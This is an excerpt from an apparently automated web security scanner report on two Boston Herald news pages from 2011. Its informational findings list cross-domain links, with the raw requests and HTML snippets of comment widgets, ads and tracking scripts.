<a href="javascript:;" title="Poor Comment" onclick="addRating(1982402,1,0);"><img id="thumb_down_1982402" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982402, 'ironrange');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982402#cnum1982402"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982402','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982404,5,0);" ><img id="thumb_up_1982404" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982404,1,0);"><img id="thumb_down_1982404" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982404, 'FromCapeCod');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982404#cnum1982404"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982404','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...

<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png" width="2" height="17" />
<img style="visibility: hidden;" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png" width="2" height="17" /></div>
...[SNIP]...
<a href="javascript:;" title="Good Comment" onclick="addRating(1982422,5,0);" ><img id="thumb_up_1982422" class="thumb_up" alt="Good Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_16.png'" onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_up_w_f2_16.png'" /></a>
...[SNIP]...
<a href="javascript:;" title="Poor Comment" onclick="addRating(1982422,1,0);"><img id="thumb_down_1982422" class="thumb_down" alt="Poor Comment" src="http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png" onmouseout="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'" onblur="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_16.png'"onmouseover="this.src='http://cache.heraldinteractive.com/images/siteImages/icons/thumbs/thumbs_down_w_f2_16.png'" /></a>
...[SNIP]...
<a class="Reply" href="#CommentPostArea" onclick="setReplyToField(1982422, 'WhyWorry');" ><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/comments_reply.png" /> Reply</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments&cnum=1&at_comment=1982422#cnum1982422"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/page_white_link.png" /> Link</a>
...[SNIP]...
<a class="Flag" href="#" onclick="flagPost('1982422','/news/regional/view.bg?articleid=1312541&cnum=1'); return false;"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniAbuse.gif"> Abusive</a>
...[SNIP]...
</a>  |  <a class="LinksRedNone" style="text-decoration:underline" href="http://www.heraldmedia.com/privacy.html" target="_new">Privacy commitment</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(108) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/"><img src="http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg" alt="Owner hopes pet snakes its way to safety" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.290. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/regional/view.bg?articleid=1312541&srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D7&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/daveWedge.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg
http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.myspace.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/regional/view.bg?articleid=1312541&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:37:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview%2F20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist%2Fsrvc%3Dhome%26position%3D7&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Feds: Fake cop scammed dates');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://www.myspace.com" >website</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(108) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/"><img src="http://multimedia.heraldinteractive.com/images/20110107/stp/c59fd8_Snake_01082011.jpg" alt="Owner hopes pet snakes its way to safety" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.291. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/regional/view.bg?articleid=1312552&srvc=next_article

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312552&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://c.brightcove.com/services/viewer/federated_f9?isVid=1
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/regional/
http://gallery.pictopia.com/bostonherald/gallery/news/Snow%20piles%20up%20in%20Bay%20State
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg
http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/e5e8bf_012711snowtf12.JPG
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/regional/view.bg?articleid=1312552&srvc=next_article HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:39:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1312552&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Another winter wallop batters Boston');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<p><object id="flashObj" width="440" height="294" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,47,0"><param name="movie" value="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" />
...[SNIP]...
<param name="allowScriptAccess" value="always" /><embed src="http://c.brightcove.com/services/viewer/federated_f9?isVid=1" bgcolor="#FFFFFF" flashVars="@videoPlayer=765743172001&playerID=90384043001&playerKey=AQ~~,AAAAE6Rs9lk~,SN2uQ1cpwujoDnoZHHOVvr4yXqH2wi5E&domain=embed&dynamicStreaming=true" base="http://admin.brightcove.com" name="flashObj" width="440" height="294" seamlesstabbing="false" type="application/x-shockwave-flash" allowFullScreen="true" swLiveConnect="true" allowScriptAccess="always" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312552&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(15) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
open photo gallery: Snow piles up in Bay State" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4880','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds..." /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4880','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/e5e8bf_012711snowtf12.JPG" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
